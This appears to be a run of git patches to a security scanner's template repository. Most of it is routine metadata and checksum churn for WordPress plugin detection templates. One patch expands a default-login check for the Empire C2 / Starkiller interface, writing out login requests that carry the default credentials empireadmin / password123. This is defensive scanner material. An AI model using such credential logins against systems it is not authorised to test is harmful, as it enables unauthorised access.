diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 7298fbee157e0f1c014cc00ccff0c8ac8480517c Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Sat, 16 Sep 2023 22:22:25 +0530
Subject: [PATCH 0395/1090] minor - changes

---
 .../empire/empirec2-default-login.yaml        | 19 ++++++++++++++-----
 1 file changed, 14 insertions(+), 5 deletions(-)

diff --git a/http/default-logins/empire/empirec2-default-login.yaml b/http/default-logins/empire/empirec2-default-login.yaml
index 3260aa78a9..c7949479a9 100644
--- a/http/default-logins/empire/empirec2-default-login.yaml
+++ b/http/default-logins/empire/empirec2-default-login.yaml
@@ -2,7 +2,7 @@ id: empirec2-default-login
 
 info:
   name: Empire C2 / Starkiller Interface - Default Login
-  author: parzival
+  author: clem9669,parzival
   severity: high
   description: |
     Empire C2 / Starkiller Default Administrator Credentials Discovered.
@@ -12,7 +12,7 @@ info:
   metadata:
     max-request: 1
     verified: true
-  tags: default-login,empire
+  tags: default-login,empire,c2
 
 http:
   - raw:
@@ -32,20 +32,29 @@ http:
         {{password}}
         ------WebKitFormBoundaryoZwyedGcQU4FrcFV--
 
+      - |
+        POST /api/admin/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"username":"{{user}}","password":"{{pass}}"}
+
     attack: pitchfork
     payloads:
       username:
         - empireadmin
       password:
-        - 'password123'
+        - password123
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - 'access_token'
-          - 'token_type'
+          - '{"token":".*"}'
+        condition: or
 
       - type: word
         part: header
@@ -54,4 +63,4 @@ http:
 
       - type: status
         status:
-          - 200
+          - 200
\ No newline at end of file

From 4c5c2d7db8b30dabdf1b42f17a9521adcc7fefd1 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 16 Sep 2023 17:51:25 +0000
Subject: [PATCH 0396/1090] Auto Generated New Template Addition List [Sat Sep
 16 17:51:25 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 8f97155aea..b1799f0eaf 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,5 +1,6 @@
 http/cves/2023/CVE-2023-22463.yaml
 http/cves/2023/CVE-2023-25573.yaml
+http/cves/2023/CVE-2023-2813.yaml
 http/cves/2023/CVE-2023-30943.yaml
 http/cves/2023/CVE-2023-39676.yaml
 http/cves/2023/CVE-2023-39677.yaml

From 5b06ec1c0466ce4a263e932b62541d7046d74e86 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 16 Sep 2023 17:51:44 +0000
Subject: [PATCH 0397/1090] Auto Generated Templates Checksum [Sat Sep 16
 17:51:44 UTC 2023] :robot:

---
 templates-checksum.txt | 407 +++++++++++++++++++++--------------------
 1 file changed, 204 insertions(+), 203 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 4598e0d901..9088aeebe7 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -541,7 +541,7 @@ helpers/wordpress/plugins/woocommerce-payments.txt:f6f8ec8cee0642425740179c78f2b
 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0
 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33e6dc123884fef23157c442970fb87
 helpers/wordpress/plugins/woocommerce-services.txt:17b06b2486a051055e43ae1127e87196d505e2f3
-helpers/wordpress/plugins/woocommerce.txt:64d44d34deaede28573d0e54fa7745978d9d2bd7
+helpers/wordpress/plugins/woocommerce.txt:dfaff11acbd25d0758b7c5294b4ff9d37debac19
 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da
 helpers/wordpress/plugins/wordfence.txt:40784b4a67e4ba8b48f28ea24427fa8550433cc1
 helpers/wordpress/plugins/wordpress-importer.txt:08208ac734b4811a00c6728e5ae1c066d2e06cc8
@@ -2563,6 +2563,7 @@ http/cves/2023/CVE-2023-27587.yaml:a819235770f464cbe1cb532b57fe34c919a7ff56
 http/cves/2023/CVE-2023-2780.yaml:db40792ff460986646151ea927034f5062b2c9f3
 http/cves/2023/CVE-2023-2796.yaml:b91a3cfc1eaf6a275aac33c7a58671633b3b6e12
 http/cves/2023/CVE-2023-28121.yaml:d2293698e26589be232d165d0739ad8349f5ad29
+http/cves/2023/CVE-2023-2813.yaml:02eb83b3e304fb859540c763c2ee3a2d47d4dba8
 http/cves/2023/CVE-2023-2822.yaml:b828499817000b8c193eeeabf2fbea5521ec4752
 http/cves/2023/CVE-2023-2825.yaml:4a18f1951a6cdbdc7b02226d6f6ae29e59188955
 http/cves/2023/CVE-2023-28343.yaml:214c6bc75489e9eb0564fd5fa72c6b4b7d2b3d9a
@@ -3449,7 +3450,7 @@ http/exposed-panels/qnap/qnap-qts-panel.yaml:987c5b15892453260e2d2fcbf96ed0bffb2
 http/exposed-panels/qualcomm-voip-router.yaml:fbd84bcc4a04ba558a62d48ce65d874626757771
 http/exposed-panels/qualtrics-login.yaml:cfa330c28b27942418931e248870124b790b00a3
 http/exposed-panels/quantum-scalar-detect.yaml:dcde0ece30651367a1914e8a38e2e317781f8f76
-http/exposed-panels/quilium-panel.yaml:fd215fa4737210fbecd82c8e66b18940173c6ce3
+http/exposed-panels/quilium-panel.yaml:44fccd3aeb3f9571b9a8320634b1c16665014dda
 http/exposed-panels/r-webserver-login.yaml:c0bd628edcce513e246ccc3ae374957b26abc607
 http/exposed-panels/rabbitmq-dashboard.yaml:a2652c4844e3bb702e48e61cdac34df3577fa073
 http/exposed-panels/racksnet-login.yaml:9e07660fba85e9b56a0059d93fa5c82c4ef395ea
@@ -5827,218 +5828,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
+http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
+http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
+http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
+http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
+http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
+http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
+http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
+http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
+http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
+http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
+http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
+http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
-http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
-http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
-http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
-http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
-http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
-http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
-http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
-http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
-http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
-http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
-http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
+http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
+http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
+http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
+http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
+http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
+http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
+http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
+http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
+http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
+http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
+http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
+http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
+http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
-http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
-http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
-http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
-http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
-http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
-http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
-http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
-http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
-http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
-http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
-http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
-http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
